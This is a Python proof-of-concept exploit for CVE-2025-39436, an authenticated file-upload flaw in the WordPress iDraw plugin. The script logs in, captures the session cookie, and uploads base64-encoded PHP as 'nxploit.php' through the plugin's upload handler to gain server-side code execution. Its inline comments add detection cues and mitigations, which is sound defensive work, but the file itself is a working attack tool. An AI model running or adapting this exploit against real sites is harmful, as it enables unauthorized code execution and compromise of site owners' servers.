POC / CVE-2025-39436.py PY
import requests
import base64
import argparse
from urllib.parse import urljoin

# Exploit By | Nxploited ( Khaled Alenazi )

# Command-line interface. The script needs the base URL of a WordPress site
# and the username/password of an account that already exists there; all
# three arguments are mandatory. Nothing in this script checks which role the
# account holds, so any login that yields a session cookie is treated as
# sufficient for the upload step further down.
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True, help="Website URL")
parser.add_argument("-un", "--username", required=True, help="Username")
parser.add_argument("-p", "--password", required=True, help="Password")
args = parser.parse_args()

# One requests.Session is reused for the login and the upload, so cookies set
# by wp-login.php are replayed automatically on the later request.
session = requests.Session()
# Certificate validation is switched off for every request on this session:
# the username and password below are posted to whatever host answers at the
# given URL, without authenticating it.
session.verify = False
# Fixed desktop-Chrome User-Agent, sent on both the login and the upload
# request. On its own it is a weak indicator, but the same string on a
# wp-login.php POST immediately followed by a POST to the plugin's upload
# handler is a useful correlation point in access logs.
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"

# Plain string concatenation: a trailing slash on --url produces
# "//wp-login.php" in the request path.
login_url = args.url + '/wp-login.php'
# Standard WordPress login form fields. requests form-encodes these values,
# so the literal '+' in 'Log+In' goes on the wire as %2B; a browser
# submitting the stock form would presumably send a space here instead, which
# makes the encoded value a possible log fingerprint (confirm against your
# own login traffic).
login_data = {
    'log': args.username,
    'pwd': args.password,
    'rememberme': 'forever',
    'wp-submit': 'Log+In'
}
headers = {"User-Agent": user_agent}
# The response object is never inspected; success is inferred only from the
# cookie jar below.
response = session.post(login_url, verify=False, data=login_data, headers=headers)

# Take the first cookie whose name contains 'wordpress_logged_in' and keep it
# as a "name=value" string for reuse in the upload form.
logged_cookie = None
for c in session.cookies:
    if 'wordpress_logged_in' in c.name:
        logged_cookie = f"{c.name}={c.value}"
        break

if not logged_cookie:
    print("[❌] Login failed or session cookie not found.")
    # exit() with no argument ends the process with status 0, so a failed
    # login is not distinguishable by exit code.
    exit()
else:
    print(f"[✅] Login successful.")
    # NOTE(review): this writes a live authentication cookie to stdout, where
    # it ends up in terminal scrollback and any captured output.
    print(f"[🍪] Session cookie:\n{logged_cookie}")

# Proof marker only: a PHP snippet that echoes a fixed string. It is base64
# encoded because it is submitted in the 'dataurl' form field below.
php_code = "<?php echo 'Im Nxploited | Khaled Alenazi'; ?>"
encoded_php = base64.b64encode(php_code.encode("utf-8")).decode("utf-8")

# The request goes straight to a PHP file inside the plugin directory rather
# than through admin-ajax.php or the REST API. Detection: any POST to
# /wp-content/plugins/idraw/idraw_upload.php in web-server logs is worth
# reviewing, especially one that follows a wp-login.php POST from the same
# client.
upload_url = args.url + "/wp-content/plugins/idraw/idraw_upload.php"
# Form fields sent to the handler. The caller chooses the stored file name,
# and here it ends in .php. The handler's source is not shown on this page;
# presumably it decodes 'dataurl' and writes it under 'filename' without
# restricting the extension or content type -- confirm against the plugin
# code. The login cookie is also passed as an ordinary form field, which
# suggests the handler reads it from the POST body (TODO confirm).
# Mitigation on the server side: require a capability check and nonce in the
# handler, allow-list image extensions and validate decoded content, and
# configure the web server so PHP is never executed from wp-content/uploads.
payload = {
    'dataurl': encoded_php,
    'filename': 'nxploit.php',
    'oldfilename': '',
    'logged_in_cookie': logged_cookie
}

upload_response = session.post(upload_url, data=payload, headers=headers)

# Success is judged by a substring match on the response body only; the
# script never requests the uploaded file to confirm it exists.
if "Image is uploaded" in upload_response.text or "nxploit.php" in upload_response.text:
    # The dated path is a hard-coded literal, not derived from the response,
    # so the printed location is unverified. When checking a site for dropped
    # files, search the whole uploads tree for unexpected .php files rather
    # than this single directory.
    final_url = args.url + "/wp-content/uploads/2025/4/19/nxploit.php"
    print(f"[✅] File uploaded successfully:\n[🔗] {final_url}")
else:
    print("[❌] File upload failed.")